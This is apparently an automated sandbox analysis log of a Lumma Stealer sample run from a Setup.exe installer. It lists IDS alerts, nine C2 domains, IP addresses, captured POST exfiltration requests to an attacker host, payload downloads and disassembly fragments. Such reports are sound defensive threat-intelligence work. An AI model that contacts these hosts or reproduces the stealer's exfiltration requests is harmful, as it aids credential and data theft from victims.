              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp dword ptr [00447B04h]0_2_0204A20E
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0204A232
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6018B610h]0_2_02037247
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6018B610h]0_2_02037256
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h0_2_02063296
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h0_2_0203BAB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0203BAB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [eax+edx*8], 11A82DE9h0_2_0203BAB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0203DAE3
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02036AE9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00AC8299h]0_2_02047B61
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0204CB76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02046B96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, edx0_2_02046B96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, edi0_2_02028BE6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0203D073
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea ecx, dword ptr [eax-5AD00D02h]0_2_02045095
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+02h]0_2_02044896
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_020628A6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp eax0_2_020370CA
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000105h]0_2_0203B0E4
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, ebx0_2_0204A928
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h0_2_02063166
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]0_2_02037972
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0204517D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h0_2_0205C1A6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp byte ptr [eax+ecx+01h], 00000000h0_2_0204C9C6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp al, 2Eh0_2_020491D5
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+18h]0_2_0205B1D6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h0_2_0205B1D6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx+07A16EB7h]0_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+07A16EB7h]0_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp eax0_2_0204C671
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ecx0_2_02036E83
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_02061EA6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ebp, dword ptr [esp+10h]0_2_0204A6B0
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push ebx0_2_0202CEBB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h0_2_02062F36
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, dword ptr [esp+30h]0_2_02047756
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_02048786
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_020486F9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, ecx0_2_02049F9F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_0204BFB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea ecx, dword ptr [eax-02B62300h]0_2_020387C7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ecx0_2_0202EFE0
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, edx0_2_0204AC6B
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, dword ptr [eax]0_2_0205BC76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push eax0_2_0205BC76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_020444F6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+44E006A7h]0_2_0204851D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ecx], ax0_2_0203F53C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edx+eax+02h], 0000h0_2_0203ED45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_0203ED45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000218h]0_2_02030548
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then test eax, eax0_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h0_2_02044D96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02044D96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7BB5E41Dh]0_2_0202D5AC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]0_2_020385CF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.198.102:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: abberanteusz.click
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Joe Sandbox ViewIP Address: 104.21.37.128 104.21.37.128
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.198.102:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.37.128:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49745
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6KMJCXQ2H9KXAAJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18143Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXYTJRBQ03JLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8746Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L57N9QSJ23X93STDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20423Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JMD9W24D8L9AGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=51VOM22OB4VHWV7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1078Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: abberanteusz.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: abberanteusz.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abberanteusz.click
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: powershell.exe, 00000002.00000002.1921140476.000000000335F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.1920940710.000000000330A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro;q
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: BrightLib.exe, 00000024.00000000.2410455644.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452973399.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453742572.000000000627E000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2452876199.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, is-7IJ4L.tmp.9.drString found in binary or memory: http://michaeluno.jp/
              Source: BrightLib.exe, 00000024.00000002.2452973399.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/4
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://subca.ocsp-certum.com01
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drString found in binary or memory: http://www.autohotkey.com
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drString found in binary or memory: http://www.autohotkey.comCould
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://www.certum.pl/CPS0
              Source: BrightLib.exe, 00000024.00000002.2478910249.0000000039F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
              Source: Setup.exeString found in binary or memory: http://www.innosetup.com/
              Source: Setup.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
